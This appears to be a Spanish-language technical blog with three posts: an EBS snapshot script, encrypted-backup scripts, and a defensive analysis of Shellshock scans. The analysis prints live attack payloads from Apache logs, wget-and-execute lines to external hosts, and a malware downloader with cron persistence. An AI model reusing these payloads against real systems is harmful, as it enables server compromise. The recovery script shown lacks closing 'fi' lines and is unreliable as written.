Se almacenan en S3, por lo tanto la durabilidad y disponibilidad de los mismos es mas que razonable.
Son incrementales, por lo tanto son eficientes en espacio y tiempo.
Restaurar un snapshot es muy sencillo, simplemente hay que crear un nuevo volumen del snapshot.

Los mismos documentos de AWS sugieren que para obtener snapshots consistentes y evitar la corrupción de los datos se deben detener las operaciones de escritura sobre el volumen por el tiempo que demore la creación del snapshot. Una forma muy sencilla de hacer esto es deteniendo totalmente la instancia, por ejemplo, o al menos desmontando el volumen del cual se está tomando el snapshot.

En casos donde detener la instancia o desmontar los volúmenes no sea posible se puede optar por congelar el sistema de archivos durante la creación del snapshot haciendo uso de xfs_freeze.

xfs_freeze permite detener las operaciones de escrituras sobre un sistema de archivos (-f), y luego retomarlas (-u).

En este post se va a describir una prueba de concepto de como se puede lograr un snapshot consistente deteniendo las operaciones de escritura sobre el volumen.

Role IAM para las instancias

Para poder tomar los snapshots de manera automática y desde las mismas instancias debemos permitirles ciertas operaciones (API calls) como CreateSnapshot, DescribeInstances y DescribeSnapshots. Para lograr esta parte podemos valernos de un Role IAM y adjuntarle la siguiente Policy:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "Stmt1447448059000",
            "Effect": "Allow",
            "Action": [
                "ec2:CreateSnapshot",
                "ec2:DescribeInstances",
                "ec2:DescribeSnapshots"
            ],
            "Resource": [
                "*"
            ]
        }
    ]
}

El rol nos permitirá darle a las instancias la capacidad de acceder a este subconjunto de la API sin tener que preocuparnos por mantener las credenciales.

Una vez creado el rol las instancias deben lanzarse utilizando dicho rol. Para comprobar que el rol se encuentra aplicado a la instancia correctamente podemos hacer lo siguiente:

[ec2-user@ip-172-31-20-132 ~]$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
EC2-BackupRole
[ec2-user@ip-172-31-20-132 ~]$

Se puede ver que el role EC2-BackupRole se encuentra asociado a la instancia. Para comprobar la autorización podemos, por ejemplo, describir el volumen del que tomaremos el snapshot:

[ec2-user@ip-172-31-20-132 ~]$ aws ec2 describe-instances --instance-ids i-8161a338 --query 'Reservations[0].Instances[0].BlockDeviceMappings[?DeviceName==`/dev/sdb`]' --output json
[
    {
        "DeviceName": "/dev/sdb",
        "Ebs": {
            "Status": "attached",
            "DeleteOnTermination": false,
            "VolumeId": "vol-e3490220",
            "AttachTime": "2015-11-14T10:28:41.000Z"
        }
    }
]
[ec2-user@ip-172-31-20-132 ~]$

Script para la creación de los snapshots

Una vez solucionada la parte de la autorización con IAM, sólo queda escribir el script que cree los snapshots. Los siguientes puntos se tendrán en cuenta:

El script debe crear un snapshot del volumen /dev/sdb, o cualquiera sea el volumen en cuestión.
El snapshot debe ser consistente. Por lo tanto debe detener las operaciones de escritura.
Se debe poder definir un timeout que permita recuperar las operaciones de escritura en caso de que la creación del snapshot demore demasiado tiempo. Por supuesto, esto pone en riesgo la integridad del snapshot, pero garantiza que se conocerá el tiempo máximo que el servicio se encontrará degradado (sin posibilidades de escribir).

A continuación el script:

#!/bin/bash

VOLUME='/dev/sdb'
MOUNT='/mnt'
LOGS=/var/log/backups.log
DONE=0
TIMEOUT=300
TIMEDOUT=0
SLEEP=30
INSTANCEID=`curl http://169.254.169.254/latest/meta-data/instance-id 2>/dev/null`
REGION=`curl http://169.254.169.254/latest/dynamic/instance-identity/document 2>/dev/null | grep region | awk -F\" '{print $4}'`
VOLUMEID=`aws ec2 describe-instances --instance-ids $INSTANCEID --region $REGION --query "Reservations[0].Instances[0].BlockDeviceMappings[?DeviceName=='$VOLUME'].Ebs.{ID:VolumeId}" --output text`
DESCRIPTION="$INSTANCEID-$VOLUMEID-$(date +%F)"

echo "$(date) Iniciando backup de: $INSTANCEID $REGION $VOLUMEID"

#Detener los servicios que quieras detener aqui

###

sync
xfs_freeze -f $MOUNT
echo "$(date) Escrituras detenidas."
SNAPSHOTID=`aws ec2 create-snapshot --volume-id $VOLUMEID --region $REGION --description $DESCRIPTION --query '{ID:SnapshotId}' --output text`
OUT=$?
if [ $OUT -ne 0 ]; then
        echo "$(date) La creacion del snapshot fallo."
        xfs_freeze -u $MOUNT
        echo "$(date) Escrituras reestablecidas."
        exit
fi
while [ $DONE = "0" ]; do
        PROGRESS=`aws ec2 describe-snapshots --snapshot-id $SNAPSHOTID --region $REGION --query 'Snapshots[0].{Progress:Progress}' --output text`
        OUT=$?
        if [ $OUT -ne 0 ]; then
                echo "$(date) Snapshot $SNAPSHOTID aun no esta disponible."
                sleep $SLEEP
                TIMEOUT=`echo "$TIMEOUT-$SLEEP" | bc`
        else
                if [ $PROGRESS = "100%" ]; then
                        DONE="1"
                        echo "$(date) Snapshot $SNAPSHOTID listo"
    else
                        echo "$(date) Snapshot $SNAPSHOTID $PROGRESS"
                        sleep $SLEEP
                        TIMEOUT=`echo "$TIMEOUT-$SLEEP" | bc`
                fi
        fi
        if [ $TIMEOUT -le 0 ]; then
                DONE="1"
                TIMEDOUT="1"
        fi
done
xfs_freeze -u $MOUNT
echo "$(date) Escrituras reestablecidas."
if [ $TIMEDOUT = "1" ]; then
        echo "$(date) Snapshot $SNAPSHOTID timed out!!! Podria ser inconsistente"
else
        echo "$(date) Snapshot $SNAPSHOTID terminado exitosamente"
fi

Prueba 1: Primer snapshot

Dada la naturaleza incremental de los snapshots, mientras mas bloques "Sucios" haya por copiar mas va a demorar el snapshot. Esto se hace mas evidente generalmente en el primer snapshot que se tome de un volumen.

Lanzamos una escritura aleatoria en background de unos 12GB de la siguiente manera

[ec2-user@ip-172-31-20-132 ~]$ sudo dd if=/dev/urandom of=/mnt/archivo_borrar bs=1M count=12000 &
[2] 4783
[ec2-user@ip-172-31-20-132 ~]$

cuando llevan escritos unos 8GB

[ec2-user@ip-172-31-20-132 ~]$ df -h
Filesystem      Size Used Avail Use% Mounted on
/dev/xvda1      7.8G 1.1G 6.6G 15% /
devtmpfs        3.9G   60K 3.9G   1% /dev
tmpfs           3.9G     0 3.9G   0% /dev/shm
/dev/xvdb        99G 8.4G   85G   9% /mnt
[ec2-user@ip-172-31-20-132 ~]$

lanzamos el snapshot

[ec2-user@ip-172-31-20-132 ~]$ sudo ./backups.sh
Sat Nov 14 17:13:24 UTC 2015 Iniciando backup de: i-8161a338 eu-west-1 vol-e3490220
Sat Nov 14 17:13:26 UTC 2015 Escrituras detenidas.
Sat Nov 14 17:13:26 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:13:57 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:14:27 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:14:58 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:15:28 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:15:58 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:16:29 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:16:59 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:17:30 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:18:00 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:18:30 UTC 2015 Escrituras reestablecidas.
Sat Nov 14 17:18:30 UTC 2015 Snapshot snap-27582071 timed out!!! Podria ser inconsistente
[ec2-user@ip-172-31-20-132 ~]$

este primer snapshot no pudo terminar en el lapso de los 300 segundos, por lo tanto podría tratarse de un snapshot inconsistente.

Poco antes de lanzar la creación del snapshot, en una segunda consola puse a correr iostat para ver el comportamiento de las operaciones de escritura, aquí están los resultados:

[ec2-user@ip-172-31-20-132 ~]$ sudo iostat -x -d /dev/xvdb 5 30
Linux 4.1.10-17.31.amzn1.x86_64 (ip-172-31-20-132)      11/14/2015      _x86_64_        (2 CPU)

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00    10.24    0.12   78.65     1.00 20046.09   254.48     9.79 124.28   0.92   7.27

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     1.60    0.00 637.40     0.00 163038.40   255.79    84.64 132.79   0.95 60.24

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.20    0.00    0.40     0.00     4.80    12.00     0.00    0.00   0.00   0.00

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.20    0.00   54.80     0.00 13931.20   254.22     4.92   55.08   0.64   3.52

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     2.40    0.00 171.60     0.00 43056.00   250.91    21.20 134.67   0.95 16.32
Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.00    0.00    0.00     0.00     0.00     0.00     0.00    0.00   0.00   0.00

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.00    0.00    0.00     0.00     0.00     0.00     0.00    0.00   0.00   0.00

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.00    0.00    0.00     0.00     0.00     0.00     0.00    0.00   0.00   0.00

...

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.00    0.00    0.00     0.00     0.00     0.00     0.00    0.00   0.00   0.00

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.00    0.00    0.00     0.00     0.00     0.00     0.00    0.00   0.00   0.00

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.00    0.00    0.20     0.00     1.60     8.00     0.00    0.00   0.00   0.00

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.80    0.00 101.40     0.00 25816.00   254.60     7.65   75.46   0.78   7.92

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.80    0.00    0.40     0.00     9.60    24.00     0.00    0.00   0.00   0.00

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.20    0.00    0.40     0.00     4.80    12.00     0.00    0.00   0.00   0.00

^C[ec2-user@ip-172-31-20-132 ~]$

se puede ver la linea en negrita (azul), como a partir de ese punto no hay mas operaciones de escritura sobre el disco. Los altos valores de escrituras en ese momento se deben a las operaciones sync y xfs_freeze. Las operaciones de escritura se re establecen mas adelante (también en negrita, roja) cuando el timeout se cumple en el script.

Prueba 2: Segundo snapshot

El segundo snapshot termina antes del timeout, por lo que se lo puede considerar aboslutamente consistente.

[ec2-user@ip-172-31-20-132 ~]$ sudo ./backups.sh
Sat Nov 14 18:14:26 UTC 2015 Iniciando backup de: i-8161a338 eu-west-1 vol-e3490220
Sat Nov 14 18:14:26 UTC 2015 Escrituras detenidas.
Sat Nov 14 18:14:27 UTC 2015 Snapshot snap-39405312 0%
Sat Nov 14 18:14:57 UTC 2015 Snapshot snap-39405312 0%
Sat Nov 14 18:15:27 UTC 2015 Snapshot snap-39405312 0%
Sat Nov 14 18:15:58 UTC 2015 Snapshot snap-39405312 0%
Sat Nov 14 18:16:28 UTC 2015 Snapshot snap-39405312 0%
Sat Nov 14 18:16:59 UTC 2015 Snapshot snap-39405312 0%
Sat Nov 14 18:17:29 UTC 2015 Snapshot snap-39405312 listo
Sat Nov 14 18:17:29 UTC 2015 Escrituras reestablecidas.
Sat Nov 14 18:17:29 UTC 2015 Snapshot snap-39405312 terminado exitosamente
[ec2-user@ip-172-31-20-132 ~]$

Resumen

Esto es una simple prueba de concepto y no fue realmente probado en ambientes de producción. Desde mis pruebas puedo decir que dd (el proceso bloqueado por xfs_freeze) no sufrió mas que el bloqueo que era de esperarse, posiblemente esto no sea tan factible en una partición donde trabaja una BD que realiza muchos inserts por ejemplo. El script podría lanzarse sencillamente desde un cronjob y tendriamos todo automatizado y aceitado!!!

domingo, 28 de septiembre de 2014

Buscando rastros de CVE-2014-6271 y CVE-2014-7169 en los logs

El miércoles pasado se descubrió una gran falla de seguridad en uno de las shells mas utilizadas en ambietes Unix-like, bash. Hoy que estoy de vuelta en el ruedo me decidí a ver si ya estabamos antes escaneos masivos en busca de servidores para explotar la vulnerabilidad y claramente si.

En un breve análisis de logs de apache vemos cosas como:

Sep 27 14:34:35 host01 host01: 37.148.163.38 - - [27/Sep/2014:14:34:34 -0300] "GET / HTTP/1.1" 200 91558 "-" "() { :;}; /bin/bash -c \"wget http://psicologoweb.net/mc/s.php/host1\""

Sep 27 15:53:26 host02 host02: 143.107.202.68 - - [27/Sep/2014:15:53:26 -0300] "GET / HTTP/1.1" 200 227 "() { foo;};echo; /usr/bin/wget 221.132.37.26/sh -O /tmp/sh; bash /tmp/sh ; rm -f /tmp/sh" "() { foo;};echo; /usr/bin/wget 221.132.37.26/sh -O /tmp/sh; bash /tmp/sh ; rm -f /tmp/sh"

Sep 27 15:53:26 host02 host02: 143.107.202.68 - - [27/Sep/2014:15:53:26 -0300] "GET / HTTP/1.1" 200 227 "() { foo;};echo; /usr/bin/wget 221.132.37.26/sh -O /tmp/sh; bash /tmp/sh ; rm -f /tmp/sh" "() { foo;};echo; /usr/bin/wget 221.132.37.26/sh -O /tmp/sh; bash /tmp/sh ; rm -f /tmp/sh"

Sep 27 15:53:26 host03 host03: 143.107.202.68 - - [27/Sep/2014:15:53:26 -0300] "GET / HTTP/1.1" 200 9836 "() { foo;};echo; /usr/bin/wget 221.132.37.26/sh -O /tmp/sh; bash /tmp/sh ; rm -f /tmp/sh" "() { foo;};echo; /usr/bin/wget 221.132.37.26/sh -O /tmp/sh; bash /tmp/sh ; rm -f /tmp/sh"

Sep 27 15:53:26 host04 host04: 143.107.202.68 - - [27/Sep/2014:15:53:26 -0300] "GET / HTTP/1.1" 200 10166 "() { foo;};echo; /usr/bin/wget 221.132.37.26/sh -O /tmp/sh; bash /tmp/sh ; rm -f /tmp/sh" "() { foo;};echo; /usr/bin/wget 221.132.37.26/sh -O /tmp/sh; bash /tmp/sh ; rm -f /tmp/sh"

La lista continua con diferentes variantes, pero en esencia se descargan desde la IP 221.132.37.26 el archivo "sh" con el siguiente contenido:

#!/bin/sh

cd /tmp;cd /dev/shm
wget -q http://221.132.37.26/xx -O ...x
chmod +x ...x
./...x
cd /dev/shm ; wget 221.132.37.26/ru ; bash ru ; rm -rf ru
cd /dev/shm ; wget 221.132.37.26/rr; bash rr; rm -rf rr
killall -9 .a .b .c .d .e .f .g .h .i .j. .k .l .m .n .o .p .q .r .s .t .u .v .x .z .y .w php
killall -9 .rnd
killall -9 .a
killall -9 kernelupdate
killall -9 dev
killall -9 sh
killall -9 bash
killall -9 apache2
killall -9 httpd
killall -9 cla
killall -9 ka
killall -9 kav
killall -9 m32
killall -9 m64
killall -9 perl
killall -9 sh
killall -9 sucrack
killall -9 m64 m32 minerd32 minerd64 minerd cla qt64 qt32 clover cron sh wget
kill -9 `pidof .rnd`
kill -9 `pidof .a .b .c .d .e .f .g .h .i .j. .k .l .m .n .o .p .q .r .s .t .u .v .x .z .y .w`
kill -9 `pidof dev`
kill -9 `pidof perl`
kill -9 `pidof m32`
kill -9 `pidof m64`
kill -9 `pidof ka`
kill -9 `pidof kav`
kill -9 `pidof cla`
kill -9 `pidof sh`
kill -9 `pidof sucrack`
echo "@weekly wget -q http://221.132.37.26/sh -O /tmp/sh;sh /tmp/sh;rm -rd /tmp/sh" >> /tmp/cron
crontab /tmp/cron
rm -rf /tmp/cron

El paso siguiente es descargarse un ejecutable llamado "xx":

file juan@moon:~$ file Descargas/xx
Descargas/xx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.15, not stripped

juan@moon:~$ ll Descargas/xx -h
-rw-rw-r-- 1 juan juan 652K 2014-09-28 21:18 Descargas/xx

juan@moon:~$ md5sum Descargas/xx
835ccabb2fded42a58f40a342a3ea189 Descargas/xx
juan@moon:~$

Un binario de un tamaño considerable, catalogado por Virustotal como un troyano para Linux (enlace del análisis: https://www.virustotal.com/es/file/b48d0534a20291bc102f1f9ba9882daf753a9a75006e0be7ffb90bfc7df7e2f1/analysis/1411951054/)

Ejecuta el troyano y descarga dos nuevos archivos "ru" y "rr", siendo el contenido de ru (rr ya fue eliminado parece ser):

#!/bin/bash
dontrun=""
arch=`uname -m`
cd /dev/shm
function runPnscan()
{

cd /dev/shm
chmod +x pnscan php
bash run &

}

function isPnscanOn()
{
pid=`pidof pnscan`
if [ "$pid" == "" ];then

retval=0
else
retval=1
fi
echo "$retval"
}
cd /dev/shm
if [ ! -f pnscan ];then
case "$arch" in
"x86_64")
wget -q http://bont.hu/ar/64.tgz -O 64.tgz
tar xvzf 64.tgz
rm -rf 64.tgz
;;
*)
wget -q http://bont.hu/ar/86.tgz -O 86.tgz
tar xvzf 86.tgz
rm -rf 86.tgz
;;
esac
fi

if [ $(isPnscanOn) == 1 ];then
# echo "Running"
exit
else
echo "Not Running"
if [ "$dontrun" != "1" ];then
$(runPnscan)
fi
fi
rm -rf /dev/shm/run
rm -rf /dev/shm/pnscan

Este nuevo script descarga mas cosas que ya no existen por lo tanto no parecería tener sentido analizarlo demasiado pero... a simple vista intenta correr a toda costa pnscan, y ¿qué demonios es eso? JA, se trata de nada mas y nada menos que un scanner de redes paralelo, es decir un software para scanear grandes redes de manera eficiente con funcionamiento multihilo lo cual lo hace muy rápido.

Continuando con el script xx vemos que una vez descargados ru y rr los ejecuta y elimina. Paso siguiente mata una cantidad considerable de procesos, muchos conocidos y otros no tanto.

Lo mas simpático de este script es el intento de inmortalizarse haciendo uso de cron:

echo "@weekly wget -q http://221.132.37.26/sh -O /tmp/sh;sh /tmp/sh;rm -rd /tmp/sh" >> /tmp/cron
crontab /tmp/cron

Como siempre se están usando sitios comprometidos para alojar el malware que se descarga, en este caso el sitio bont.hu por ejemplo.

Recomendaciones:

-Revisen los logs y busquen cadenas como "/bin/bash", "echo", "/bin/wget", etc, junto con "() {", etc.
-Si encuentran sistemas que registraron estos logs, analicen mas a fondo para ver si realmente fue ejecutada la orden. Si la aplicación web tien cgi activados, con mas razón aún.
-Eliminen todos los archivos de /tmp/
-Busquen conexiones desde/hacia el servidor en puertos raros con netstat por ejemplo (si es que no fue cambiado por un rootkit claro xD)
-Por último cabe recordar que no hay que fiarse demasiado de la información que entregue el sistema dado que puede haber sido comprometido.

Saludossss

sábado, 7 de junio de 2014

Una simple forma de tener backups encriptados

Hace unos días tuve un pequeño incidente con mi laptop que me hizo re pensar la forma en que hago backup a los archivos mas importantes que tengo en la misma. El incidente fue muy sencillo, de la noche a la mañana el teclado dejó de funcionar... por lo tanto decidí que debo cambiarla de una vez por todas, pero mientras lo hago debo tener backups de mis archivos en caso de que muera sorpresivamente.

El mecanismo va a estar compuesto por dos scripts, uno que hace efectivamente el backup, lo comprime, lo cifra y lo guarda en algún lugar y otro que es capaz de realizar la operación inversa para obtener los archivos deseados.

Script de backup

El script es el siguiente

#!/bin/bash

#Directorio donde se almacenan los backups

BACKUPS_DIR=/home/juan/backups/

#Nombre del archivo resultado del backup

SALIDA=backup_`date +%d_%m_%Y`.txt

#Archivo temporal

BKP_TMP=bkp

#Lista de los directorios a respaldar, un directorio/archivo por linea

DIRECTORIOS="/home/juan/cosas \

/home/juan/Scripts"

#Empaquetado y compresion

tar -cjvf $BKP_TMP $DIRECTORIOS

#Cifrado del backup con AES

openssl enc -e -aes-256-cbc -in $BKP_TMP -out $SALIDA -a

#Elimino el archivo temporal

rm $BKP_TMP

#Movimiento del backup a un lugar específico

mv $SALIDA $BACKUPS_DIR

es bastante sencillo y está autocomentado. En esencia toma una lista de directorios y/o archivos, los empaqueta y comprime con tar para luego cifrarlos usando AES-256 con OpenSSL. Por último mueve el archivo generado a un directorio que podría (debería de hecho) estar por NFS montado desde un lugar remoto.

Hay una opción interesante en la linea de cifrado y es la opción "-a", esta le indica a OpenSSl que luego de cifrar el archivo lo codifique en Base64 por lo tanto vamos a terminar con un archivo lleno de caracteres imprimibles ASCII, archivo que incluso podríamos mandar por mail sin problemas. Ejemplo:

juan@moon:~$ file backups/backup_07_06_2014.txt
backups/backup_07_06_2014.txt: ASCII text
juan@moon:~$ head -5 backups/backup_07_06_2014.txt
U2FsdGVkX19MkkXun9GG1psdETXgurINgFQ74plHh6GbgRe8pkdOyxHm2/ycxohn
pIf8YOXlNCteuGJGAEqqnnr4tykNqMsEdfzBRVklUqFcRBWn9aIifdPwbKtG0eT3
a2npSoFawKLGHn17MT+/kW5RkcDixdEQfZu2AuE3K3rEYOUdJCheqiP+VuFFOGQr
vGtv8pTaTcsNEGUilhQ+gm/4jBx0TnUluMWLswtatEuhgmjssqwcuskGbebZ2C/l
bWD9OlRczkodiNI6XxlfSTQomDmuMj5w98EJNxbLFmTolQIupO1HJu7dXa5a6957
juan@moon:~$

Ni mas ni menos que un simple archivo de texto.

Script de recuperación de backups

Este script completa el circuito del procedimiento de backups y es el que nos permitirá recuperar la información. El script se llama recuperar_backup.sh.

#!/bin/bash

#Directorio donde se almacenan los backups

BACKUPS_DIR=/home/juan/backups/

echo "Ingrese el nombre del archivo: "

read ARCHIVO

if [ -f $BACKUPS_DIR$ARCHIVO ];

then

mkdir $BACKUPS_DIR/TMP

#Decifrar el archivo en un directorio temporal

openssl enc -d -aes-256-cbc -in $BACKUPS_DIR/$ARCHIVO -out $BACKUPS_DIR/TMP/$ARCHIVO -a

if [ $? == 0 ];

then

cd $BACKUPS_DIR/TMP/

tar -xvf $ARCHIVO

else

echo "Password incorrecto"

else

echo "$ARCHIVO no existe."

Como pueden ver es muy sencillo, espera el nombre del archivo a recuperar, luego unas pocas validaciones y por último decifrar el archivo con OpenSSL. Los datos son descomprimidos y desempaquetedos dentro de un directorio llamado TMP, allí podremos ver nuestros archivos.